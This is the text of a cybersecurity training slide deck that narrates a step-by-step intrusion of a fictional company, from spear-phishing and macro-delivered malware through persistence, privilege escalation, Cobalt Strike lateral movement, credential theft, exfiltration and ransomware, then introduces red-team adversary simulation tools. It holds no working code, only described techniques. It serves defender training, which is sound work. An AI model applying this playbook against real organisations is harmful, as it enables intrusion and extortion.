Kickstart Your

Cybersecurity Career
BY A M R T HA B ET
 Let me Introduce Myself
• My name is Amr Thabet
• I was working in Symantec for 3 years
• Now I’m working in Tenable (Nessus
Scanner)
• Author of “Mastering Malware Analysis”
book
• Speaker at DEFCON, Hack In Paris, VB
Conference and others
 • Module 01: How Real Attacks Look
like? (Attacker’s Mindset)

• Module 02: How to response to these

attacks? (Defender’s Mindset)

What We • Module 03: Malware Analysis

Gonna Cover
In This • BONUS Module: Fileless Attacks,
Ransomware & Yara Rules
Training?
Real Attack Scenario
Attacking Company x: The
Actor
• A group of attackers decided to target
Company X for financial gain
• Their plan is to steal sensitive information
for selling on underground forums
• Later, they will capitalize more with their
ransomware.

Source: Kingspan.com (This picture is not for Company X. Just used for imagination)
Attacking Company X: The Attack
Process
The Goal of This Attack
• The ultimate goal for the attacker is to get a
domain admin account.
• A Domain Admin has a full access over the
domain controller (DC) and all resources in the
network
• From there, the attacker can reach most of the
needed systems for accessing sensitive
information
• Also a good access to the servers and their
backups for an effective ransomware encryption.
Attacking Company X: Reconnaissance
• First week, the attackers started mapping the employees
of this organization.
• Collect their name, last name, email, their department
and job position.
• All these info will help them deliver a highly targeted spear-
phishing attack

• Spear-Phishing: It’s the process of sending highly

sophisticated and targeted emails that can deceive the
victim to trust the sender and install a malware on his
machine or provide sensitive information to the attacker
Planning the attack:
Server-side Vs Client-Side
• Server-side attacks (vulnerable ports or web
attacks) seemed way more difficult for them

• Client-side attacks (like spear-phishing) are easier

as they target the weakest link in the cybersecurity
chain (humans)
The Planned Attack
Spear-Phishing emails to payroll
• After Reconnaissance, the attackers started
sending their well-crafted phishing emails
Spear-Phishing Malicious Attachment
• The malicious email included an excel document
attachment.
Spear-Phishing Malicious Attachment
• This malicious document included a macro code
that downloads and executes a Trickybot
malware using Powershell
They Got Their Foot in The Door
• One employee in the payroll called David has
been tricked by this malicious document
• He downloaded the attachment and enabled the
macro.
• The malicious document downloaded Trickybot
malware into his machine
• It gave the attacker an initial access into the
company network
Maintaining Persistence
• The attacker doesn’t want the access once, he
wants it everyday
• he wants to make sure his malware runs every time
the system boots up.
• He used a well-known registry key called:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Cu
rrentVersion\Run

• He added an entry with the file path for his

malware
Cyber kill chain
Three levels of privileges
• High Integrity: This is a full administrative access
• Medium Integrity: Standard User Access
• Low Integrity: Restricted User Access
Privilege Escalation
• He used PowerSploit, a script called PowerUp.ps1 for
privilege escalation
He Wants The Full Access
• He found a service with
read/write permissions, he
modified it to run his
malware instead.
• Now his malware runs as a
service with administrative
privileges
• He can now dump David
credentials from memory
and use his domain account
to access other machines in
the organization
Cyber kill chain
Network Discovery
• The Attacker now wants to discover the network
• He runs AdFind.exe (Microsoft application) to explore the
network around him.
Lateral Movement
• The Attacker started to use David account to execute
encoded powershell commands on other systems
• Installed a Keylogger on multiple machines to steal
credentials
• He installed Cobalt Strike BEACONS on different machines
to control them
 Lateral Movement
• This tool helps the
attacker to control
lots of machines at
once
• It allows to disguise
the internet
communications
• It can make it look
like a legitimate
connection
• It allows for peer-to-
peer communication
• It allows to send
commands through
multiple hops
Domain Administrator
• From of the machines had an IT Support RDP session
credentials in memory
• The IT Support terminated the RDP connection in a wrong
way that kept the credentials in memory
• The attacker got the credentials and moved to the
Domain Controller
• From Domain Controller, he was able to get all users
credentials and access to all important servers and
sensitive information
Cyber kill chain
Exfiltration
• The attacker started exfiltrating lots of information and
source code from the organization systems and shared
resources
• The attacker got access to backups as well as the main
servers
• After the exfiltration, the attacker decided to encrypt all
the servers and the backups so he can force the
organization to pay the ransom
• He installed his ransomware everywhere and made it run
over the weekend.
The Attack Lifecycle
So, What’s Cyber Kill Chain?

“The cyber kill chain is a series of steps that trace stages of a

cyberattack from the early reconnaissance stages to the
exfiltration of data. The kill chain helps us understand and
combat ransomware, security breaches, and advanced
persistent attacks (APTs).”
Cyber kill chain
MITTRE ATT&CK
MITTRE ATT&CK: Sub-Techniques
Advanced Red Teaming:
Real Attack Simulation
Penetration testing vs Real Attack
Simulation
• Pentesting is noisy and doesn’t test blue team monitoring and
detection capabilities.
• Pentesting is not intelligence driven
• Pentesting might lead the company to focus on the less
important vulnerabilities to patch
• Real attack simulation tests the company security against the
type of techniques it might face
• Real attack simulation tests not only the controls but the
security teams themselves
Adversary Simulation Steps
1. Collect all the adversaries that might target your organization
2. Collect all the techniques, tactics and procedures these
attackers used (Their behavior, not their exact commands)
3. Set your adversary simulation plan
4. Prepare your tools arsenal (from publicly available tools to
customized private tools).
5. Execute the simulation and report the weaknesses
Step 1: Collect Adversaries
• This step is done by using threat intelligence info.
• Understand who are targeting your country, your sector and
who are targeting similar organizations to you.
Step 2: Collect Their TTPs
Step 3: Adversary Simulation Plan
Step 4: Prepare your Arsenal
• You can use publicly available tools like Metasploit or Empire
(Easier to detect)

• You can use privately available tools like Cobalt Strike or

Cymulate (Not too hard to detect)

• You can develop your own tools with unknown signatures and
customized network communication (Hard to detect)
Step 5: Execute the attack
Resources:
• Check MITRE ATT&CK APT 3 Simulation
https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf
The Execution
The Attack Cycle

Source: public.navy.mil
Initial Access – Spear-phishing Demo
• Demo Example: Malicious Document With Macro
APT/Adversary Simulation Frameworks
• Caldera: A cyber security framework designed to easily run
autonomous breach-and-simulation exercises. It can also be
used to run manual red-team engagements or automated
incident response. (Free)

• Cobalt Strike: Software for Adversary Simulations and Red

Team Operations (Paid)
Other Useful Frameworks
• Empire: post-exploitation framework (No longer supported)

• BloodHound: BloodHound uses graph theory to reveal the

hidden and often unintended relationships within an Active
Directory environment. Attackers can use BloodHound to easily
identify highly complex attack paths that would otherwise be
impossible to quickly identify.
Caldera - Demo
• Post-Exploitation with Caldera Demo
Additional Resources
Advanced Penetration Testing Book
• Advanced Penetration Testing:
Hacking The World Most
Secure Networks
Others
• MITRE ATT&CK References:
https://attack.mitre.org/techniques/enterprise/

• Caldera Plugins at:

https://github.com/mitre/caldera/tree/master/plugins